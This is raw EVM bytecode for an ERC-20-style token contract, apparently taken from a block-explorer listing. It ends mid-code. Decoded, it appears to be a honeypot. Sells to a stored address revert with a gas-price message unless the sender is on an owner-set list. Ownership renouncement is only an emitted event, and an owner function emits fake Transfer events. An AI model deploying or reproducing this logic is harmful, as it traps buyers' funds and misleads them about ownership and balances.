0006ab919062000f4d565b925050819055506200078e565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101562000747578381836040517fe450d38c0000000000000000000000000000000000000000000000000000000081526004016200073e9392919062000f99565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620007d9578060026000828254039250508190555062000826565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200090b57600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620008fd919062000fd6565b60405180910390a362000a59565b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603620009f0578173ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620009e2919062000fd6565b60405180910390a362000a58565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000a4f919062000fd6565b60405180910390a35b5b505050565b60003a90508181111562000aa9576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000aa0906200107a565b60405180910390fd5b5050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000b2f57607f821691505b60208210810362000b455762000b4462000ae7565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830262000baf7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000b70565b62000bbb868362000b70565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000c0862000c0262000bfc8462000bd3565b62000bdd565b62000bd3565b9050919050565b6000819050919050565b62000c248362000be7565b62000c3c62000c338262000c0f565b84845462000b7d565b825550505050565b600090565b62000c5362000c44565b62000c6081848462000c19565b505050565b5b8181101562000c885762000c7c60008262000c49565b60018101905062000c66565b5050565b601f82111562000cd75762000ca18162000b4b565b62000cac8462000b60565b8101602085101562000cbc578190505b62000cd462000ccb8562000b60565b83018262000c65565b50505b505050565b600082821c905092915050565b600062000cfc6000198460080262000cdc565b1980831691505092915050565b600062000d17838362000ce9565b9150826002028217905092915050565b62000d328262000aad565b67ffffffffffffffff81111562000d4e5762000d4d62000ab8565b5b62000d5a825462000b16565b62000d6782828562000c8c565b600060209050601f83116001811462000d9f576000841562000d8a578287015190505b62000d96858262000d09565b86555062000e06565b601f19841662000daf8662000b4b565b60005b8281101562000dd95784890151825560018201915060208501945060208101905062000db2565b8683101562000df9578489015162000df5601f89168262000ce9565b8355505b6001600288020188555050505b505050505050565b600080fd5b62000e1e8162000bd3565b811462000e2a57600080fd5b50565b60008151905062000e3e8162000e13565b92915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000e718262000e44565b9050919050565b62000e838162000e64565b811462000e8f57600080fd5b50565b60008151905062000ea38162000e78565b92915050565b6000806040838503121562000ec35762000ec262000e0e565b5b600062000ed38582860162000e2d565b925050602062000ee68582860162000e92565b9150509250929050565b62000efb8162000e64565b82525050565b600060208201905062000f18600083018462000ef0565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000f5a8262000bd3565b915062000f678362000bd3565b925082820190508082111562000f825762000f8162000f1e565b5b92915050565b62000f938162000bd3565b82525050565b600060608201905062000fb0600083018662000ef0565b62000fbf602083018562000f88565b62000fce604083018462000f88565b949350505050565b600060208201905062000fed600083018462000f88565b92915050565b600082825260208201905092915050565b7f4e65656420746f206f7074696d697a6520676173207072696365207768656e2060008201527f73656e6420747800000000000000000000000000000000000000000000000000602082015250565b60006200106260278362000ff3565b91506200106f8262001004565b604082019050919050565b60006020820190508181036000830152620010958162001053565b9050919050565b61205c80620010ac6000396000f3fe608060405234801561001057600080fd5b506004361061018e5760003560e01c806370a08231116100de578063aac0393911610097578063daea85c511610071578063daea85c514610463578063dd62ed3e1461047f578063e086e5ec146104af578063f2fde38b146104b95761018e565b8063aac039391461040b578063b839a80e14610429578063cc1776d3146104455761018e565b806370a0823114610347578063715018a6146103775780637b61c320146103815780638da5cb5b1461039f57806395d89b41146103bd578063a9059cbb146103db5761018e565b80631e7be2101161014b578063313ce56711610125578063313ce567146102d15780634022b75e146102ef5780634f7041a51461030b5780636c02a931146103295761018e565b80631e7be2101461025357806323b872dd146102835780632711b8a5146102b35761018e565b8063068acf6c1461019357806306fdde03146101af578063095ea7b3146101cd5780630d1d9b8e146101fd5780631641f1ba1461021957806318160ddd14610235575b600080fd5b6101ad60048036038101906101a891906117f3565b6104d5565b005b6101b76105de565b6040516101c491906118b0565b60405180910390f35b6101e760048036038101906101e29190611908565b610670565b6040516101f49190611963565b60405180910390f35b610217600480360381019061021291906117f3565b610693565b005b610233600480360381019061022e919061197e565b6106df565b005b61023d610721565b60405161024a91906119ba565b60405180910390f35b61026d600480360381019061026891906117f3565b61072b565b60405161027a9190611963565b60405180910390f35b61029d600480360381019061029891906119d5565b61074b565b6040516102aa9190611963565b60405180910390f35b6102bb61077a565b6040516102c891906119ba565b60405180910390f35b6102d9610783565b6040516102e69190611a44565b60405180910390f35b61030960048036038101906103049190611c6a565b61078c565b005b610313610852565b60405161032091906119ba565b60405180910390f35b610331610858565b60405161033e91906118b0565b60405180910390f35b610361600480360381019061035c91906117f3565b6108e6565b60405161036e91906119ba565b60405180910390f35b61037f61092e565b005b61038961099a565b60405161039691906118b0565b60405180910390f35b6103a7610a28565b6040516103b49190611d04565b60405180910390f35b6103c5610a52565b6040516103d291906118b0565b60405180910390f35b6103f560048036038101906103f09190611908565b610ae4565b6040516104029190611963565b60405180910390f35b610413610b07565b6040516104209190611d04565b60405180910390f35b610443600480360381019061043e919061197e565b610b2d565b005b61044d610b6f565b60405161045a91906119ba565b60405180910390f35b61047d600480360381019061047891906117f3565b610b75565b005b61049960048036038101906104949190611d1f565b610bd8565b6040516104a691906119ba565b60405180910390f35b6104b7610c5f565b005b6104d360048036038101906104ce91906117f3565b610cb0565b005b6104dd610d36565b60008173ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b81526004016105189190611d04565b602060405180830381865afa158015610535573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105599190611d74565b90508173ffffffffffffffffffffffffffffffffffffffff1663a9059cbb33836040518363ffffffff1660e01b8152600401610596929190611da1565b6020604051808303816000875af11580156105b5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105d99190611df6565b505050565b6060600380546105ed90611e52565b80601f016020809104026020016040519081016040528092919081815260200182805461061990611e52565b80156106665780601f1061063b57610100808354040283529160200191610666565b820191906000526020600020905b81548152906001019060200180831161064957829003601f168201915b5050505050905090565b60008061067b610dbd565b9050610688818585610dc5565b600191505092915050565b61069b610d36565b80600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6106e7610d36565b7fd3b613dda5c9cdfd44a8f58e5198dec35a31f7f9d39dec2fd6b532e47989c7b98160405161071691906119ba565b60405180910390a150565b6000600254905090565b600b6020528060005260406000206000915054906101000a900460ff1681565b600080610756610dbd565b9050610763858285610dd7565b61076e858585610e6b565b60019150509392505050565b60006001905090565b60006012905090565b610794610d36565b60005b825181101561084c578281815181106107b3576107b2611e83565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84848151811061081c5761081b611e83565b5b602002602001015160405161083191906119ba565b60405180910390a3808061084490611ee1565b915050610797565b50505050565b600d5481565b6008805461086590611e52565b80601f016020809104026020016040519081016040528092919081815260200182805461089190611e52565b80156108de5780601f106108b3576101008083540402835291602001916108de565b820191906000526020600020905b8154815290600101906020018083116108c157829003601f168201915b505050505081565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610936610d36565b600073ffffffffffffffffffffffffffffffffffffffff16610956610a28565b73ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3565b600980546109a790611e52565b80601f01602080910402602001604051908101604052809291908181526020018280546109d390611e52565b8015610a205780601f106109f557610100808354040283529160200191610a20565b820191906000526020600020905b815481529060010190602001808311610a0357829003601f168201915b505050505081565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610a6190611e52565b80601f0160208091040260200160405190810160405280929190818152602001828054610a8d90611e52565b8015610ada5780601f10610aaf57610100808354040283529160200191610ada565b820191906000526020600020905b815481529060010190602001808311610abd57829003601f168201915b5050505050905090565b600080610aef610dbd565b9050610afc818585610e6b565b600191505092915050565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b610b35610d36565b7f0d61b965947cabd8d137e76c38fd92e63d79b181830e0918b69794938355febd81604051610b6491906119ba565b60405180910390a150565b600c5481565b610b7d610d36565b6001600b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610c67610d36565b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610cad573d6000803e3d6000fd5b50565b610cb8610d36565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d2a5760006040517f1e4fbdf7000000000000000000000000000000000000000000000000000000008152600401610d219190611d04565b60405180910390fd5b610d3381610f5f565b50565b610d3e610dbd565b73ffffffffffffffffffffffffffffffffffffffff16610d5c610a28565b73ffffffffffffffffffffffffffffffffffffffff1614610dbb57610d7f610dbd565b6040517f118cdaa7000000000000000000000000000000000000000000000000000000008152600401610db29190611d04565b60405180910390fd5b565b600033905090565b610dd28383836001611025565b505050565b6000610de38484610bd8565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e655781811015610e55578281836040517ffb8f41b2000000000000000000000000000000000000000000000000000000008152600401610e4c93929190611f29565b60405180910390fd5b610e6484848484036000611025565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610edd5760006040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610ed49190611d04565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f4f5760006040517fec442f05000000000000000000000000000000000000000000000000000000008152600401610f469190611d04565b60405180910390fd5b610f5a8383836111fc565b505050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036110975760006040517fe602df0500000000000000000000000000000000000000000000000000000000815260040161108e9190611d04565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111095760006040517f94280d620000000000000000000000000000000000000000000000000000000081526004016111009190611d04565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080156111f6578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516111ed91906119ba565b60405180910390a35b50505050565b600b60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561125e5761125983838361134c565b611347565b6000829050600073ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036112ca576112c484848461134c565b50611347565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361133a5761132a84848461134c565b6113346001611735565b50611347565b61134584848461134c565b505b505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361139e5780600260008282546113929190611f60565b92505081905550611471565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561142a578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161142193929190611f29565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036114ba5780600260008282540392505081905550611507565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036115e857600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516115db91906119ba565b60405180910390a3611730565b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036116c9578173ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516116bc91906119ba565b60405180910390a361172f565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161172691906119ba565b60405180910390a35b5b505050565b60003a90508181111561177d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161177490612006565b60405180910390fd5b5050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006117c082611795565b9050919050565b6117d0816117b5565b81146117db57600080fd5b50565b6000813590506117ed816117c7565b92915050565b6000602082840312156118095761180861178b565b5b6000611817848285016117de565b91505092915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561185a57808201518184015260208101905061183f565b60008484015250505050565b6000601f19601f8301169050919050565b600061188282611820565b61188c818561182b565b935061189c81856020860161183c565b6118a581611866565b840191505092915050565b600060208201905081810360008301526118ca8184611877565b905092915050565b6000819050919050565b6118e5816118d2565b81146118f057600080fd5b50565b600081359050611902816118dc565b92915050565b6000806040838503121561191f5761191e61178b565b5b600061192d858286016117de565b925050602061193e858286016118f3565b9150509250929050565b60008115159050919050565b61195d81611948565b82525050565b60006020820190506119786000830184611954565b92915050565b6000602082840312156119945761199361178b565b5b60006119a2848285016118f3565b91505092915050565b6119b4816118d2565b82525050565b60006020820190506119cf60008301846119ab565b92915050565b6000806000606084860312156119ee576119ed61178b565b5b60006119fc868287016117de565b9350506020611a0d868287016117de565b9250506040611a1e868287016118f3565b9150509250925092565b600060ff82169050919050565b611a3e81611a28565b82525050565b6000602082019050611a596000830184611a35565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b611a9c82611866565b810181811067ffffffffffffffff82111715611abb57611aba611a64565b5b80604052505050565b6000611ace611781565b9050611ada8282611a93565b919050565b600067ffffffffffffffff821115611afa57611af9611a64565b5b602082029050602081019050919050565b600080fd5b6000611b23611b1e84611adf565b611ac4565b90508083825260208201905060208402830185811115611b4657611b45611b0b565b5b835b81811015611b6f5780611b5b88826117de565b845260208401935050602081019050611b48565b5050509392505050565b600082601f830112611b8e57611b8d611a5f565b5b8135611b9e848260208601611b10565b91505092915050565b600067ffffffffffffffff821115611bc257611bc1611a64565b5b602082029050602081019050919050565b6000611be6611be184611ba7565b611ac4565b90508083825260208201905060208402830185811115611c0957611c08611b0b565b5b835b81811015611c325780611c1e88826118f3565b845260208401935050602081019050611c0b565b5050509392505050565b600082601f830112611c5157611c50611a5f565b5b8135611c61848260208601611bd3565b91505092915050565b600080600060608486031215611c8357611c8261178b565b5b6000611c91868287016117de565b935050602084013567ffffffffffffffff811115611cb257611cb1611790565b5b611cbe86828701611b79565b925050604084013567ffffffffffffffff811115611cdf57611cde611790565b5b611ceb86828701611c3c565b9150509250925092565b611cfe816117b5565b82525050565b6000602082019050611d196000830184611cf5565b92915050565b60008060408385031215611d3657611d3561178b565b5b6000611d44858286016117de565b9250506020611d55858286016117de565b9150509250929050565b600081519050611d6e816118dc565b92915050565b600060208284031215611d8a57611d8961178b565b5b6000611d9884828501611d5f565b91505092915050565b6000604082019050611db66000830185611cf5565b611dc360208301846119ab565b9392505050565b611dd381611948565b8114611dde57600080fd5b50565b600081519050611df081611dca565b92915050565b600060208284031215611e0c57611e0b61178b565b5b6000611e1a84828501611de1565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611e6a57607f821691505b602082108103611e7d57611e7c611e23565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611eec826118d2565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611f1e57611f1d611eb2565b5b600182019050919050565b6000606082019050611f3e6000830186611cf5565b611f4b60208301856119ab565b611f5860408301846119ab565b949350505050565b6000611f6b826118d2565b9150611f76836118d2565b9250828201905080821115611f8e57611f8d611eb2565b5b92915050565b7f4e65656420746f206f7074696d697a6520676173207072696365207768656e2060008201527f73656e6420747800000000000000000000000000000000000000000000000000602082015250565b6000611ff060278361182b565b9150611ffb82611f94565b604082019050919050565b6000602082019050818103600083015261201f81611fe3565b905091905056fea2646970667358221220e759f2bc6040ede727bfa9ee5cc26b3846b196d4437997ca26c267f16f0fc20264736f6c634300081300330000000000000000000000000000000000000000006373b15c222f297bc00000000000000000000000000000fd7972b704137cd17ec2100a86c81d3fc878b9b7
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061018e5760003560e01c806370a08231116100de578063aac0393911610097578063daea85c511610071578063daea85c514610463578063dd62ed3e1461047f578063e086e5ec146104af578063f2fde38b146104b95761018e565b8063aac039391461040b578063b839a80e14610429578063cc1776d3146104455761018e565b806370a0823114610347578063715018a6146103775780637b61c320146103815780638da5cb5b1461039f57806395d89b41146103bd578063a9059cbb146103db5761018e565b80631e7be2101161014b578063313ce56711610125578063313ce567146102d15780634022b75e146102ef5780634f7041a51461030b5780636c02a931146103295761018e565b80631e7be2101461025357806323b872dd146102835780632711b8a5146102b35761018e565b8063068acf6c1461019357806306fdde03146101af578063095ea7b3146101cd5780630d1d9b8e146101fd5780631641f1ba1461021957806318160ddd14610235575b600080fd5b6101ad60048036038101906101a891906117f3565b6104d5565b005b6101b76105de565b6040516101c491906118b0565b60405180910390f35b6101e760048036038101906101e29190611908565b610670565b6040516101f49190611963565b60405180910390f35b610217600480360381019061021291906117f3565b610693565b005b610233600480360381019061022e919061197e565b6106df565b005b61023d610721565b60405161024a91906119ba565b60405180910390f35b61026d600480360381019061026891906117f3565b61072b565b60405161027a9190611963565b60405180910390f35b61029d600480360381019061029891906119d5565b61074b565b6040516102aa9190611963565b60405180910390f35b6102bb61077a565b6040516102c891906119ba565b60405180910390f35b6102d9610783565b6040516102e69190611a44565b60405180910390f35b61030960048036038101906103049190611c6a565b61078c565b005b610313610852565b60405161032091906119ba565b60405180910390f35b610331610858565b60405161033e91906118b0565b60405180910390f35b610361600480360381019061035c91906117f3565b6108e6565b60405161036e91906119ba565b60405180910390f35b61037f61092e565b005b61038961099a565b60405161039691906118b0565b60405180910390f35b6103a7610a28565b6040516103b49190611d04565b60405180910390f35b6103c5610a52565b6040516103d291906118b0565b60405180910390f35b6103f560048036038101906103f09190611908565b610ae4565b6040516104029190611963565b60405180910390f35b610413610b07565b6040516104209190611d04565b60405180910390f35b610443600480360381019061043e919061197e565b610b2d565b005b61044d610b6f565b60405161045a91906119ba565b60405180910390f35b61047d600480360381019061047891906117f3565b610b75565b005b61049960048036038101906104949190611d1f565b610bd8565b6040516104a691906119ba565b60405180910390f35b6104b7610c5f565b005b6104d360048036038101906104ce91906117f3565b610cb0565b005b6104dd610d36565b60008173ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b81526004016105189190611d04565b602060405180830381865afa158015610535573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105599190611d74565b90508173ffffffffffffffffffffffffffffffffffffffff1663a9059cbb33836040518363ffffffff1660e01b8152600401610596929190611da1565b6020604051808303816000875af11580156105b5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105d99190611df6565b505050565b6060600380546105ed90611e52565b80601f016020809104026020016040519081016040528092919081815260200182805461061990611e52565b80156106665780601f1061063b57610100808354040283529160200191610666565b820191906000526020600020905b81548152906001019060200180831161064957829003601f168201915b5050505050905090565b60008061067b610dbd565b9050610688818585610dc5565b600191505092915050565b61069b610d36565b80600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6106e7610d36565b7fd3b613dda5c9cdfd44a8f58e5198dec35a31f7f9d39dec2fd6b532e47989c7b98160405161071691906119ba565b60405180910390a150565b6000600254905090565b600b6020528060005260406000206000915054906101000a900460ff1681565b600080610756610dbd565b9050610763858285610dd7565b61076e858585610e6b565b60019150509392505050565b60006001905090565b60006012905090565b610794610d36565b60005b825181101561084c578281815181106107b3576107b2611e83565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84848151811061081c5761081b611e83565b5b602002602001015160405161083191906119ba565b60405180910390a3808061084490611ee1565b915050610797565b50505050565b600d5481565b6008805461086590611e52565b80601f016020809104026020016040519081016040528092919081815260200182805461089190611e52565b80156108de5780601f106108b3576101008083540402835291602001916108de565b820191906000526020600020905b8154815290600101906020018083116108c157829003601f168201915b505050505081565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610936610d36565b600073ffffffffffffffffffffffffffffffffffffffff16610956610a28565b73ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3565b600980546109a790611e52565b80601f01602080910402602001604051908101604052809291908181526020018280546109d390611e52565b8015610a205780601f106109f557610100808354040283529160200191610a20565b820191906000526020600020905b815481529060010190602001808311610a0357829003601f168201915b505050505081565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610a6190611e52565b80601f0160208091040260200160405190810160405280929190818152602001828054610a8d90611e52565b8015610ada5780601f10610aaf57610100808354040283529160200191610ada565b820191906000526020600020905b815481529060010190602001808311610abd57829003601f168201915b5050505050905090565b600080610aef610dbd565b9050610afc818585610e6b565b600191505092915050565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b610b35610d36565b7f0d61b965947cabd8d137e76c38fd92e63d79b181830e0918b69794938355febd81604051610b6491906119ba565b60405180910390a150565b600c5481565b610b7d610d36565b6001600b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610c67610d36565b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610cad573d6000803e3d6000fd5b50565b610cb8610d36565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d2a5760006040517f1e4fbdf7000000000000000000000000000000000000000000000000000000008152600401610d219190611d04565b60405180910390fd5b610d3381610f5f565b50565b610d3e610dbd565b73ffffffffffffffffffffffffffffffffffffffff16610d5c610a28565b73ffffffffffffffffffffffffffffffffffffffff1614610dbb57610d7f610dbd565b6040517f118cdaa7000000000000000000000000000000000000000000000000000000008152600401610db29190611d04565b60405180910390fd5b565b600033905090565b610dd28383836001611025565b505050565b6000610de38484610bd8565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e655781811015610e55578281836040517ffb8f41b2000000000000000000000000000000000000000000000000000000008152600401610e4c93929190611f29565b60405180910390fd5b610e6484848484036000611025565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610edd5760006040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610ed49190611d04565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f4f5760006040517fec442f05000000000000000000000000000000000000000000000000000000008152600401610f469190611d04565b60405180910390fd5b610f5a8383836111fc565b505050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036110975760006040517fe602df0500000000000000000000000000000000000000000000000000000000815260040161108e9190611d04565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111095760006040517f94280d620000000000000000000000000000000000000000000000000000000081526004016111009190611d04565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080156111f6578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516111ed91906119ba565b60405180910390a35b50505050565b600b60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561125e5761125983838361134c565b611347565b6000829050600073ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036112ca576112c484848461134c565b50611347565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361133a5761132a84848461134c565b6113346001611735565b50611347565b61134584848461134c565b505b505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361139e5780600260008282546113929190611f60565b92505081905550611471565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561142a578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161142193929190611f29565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036114ba5780600260008282540392505081905550611507565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036115e857600660009054906101000a900473ffffffffffffffffffff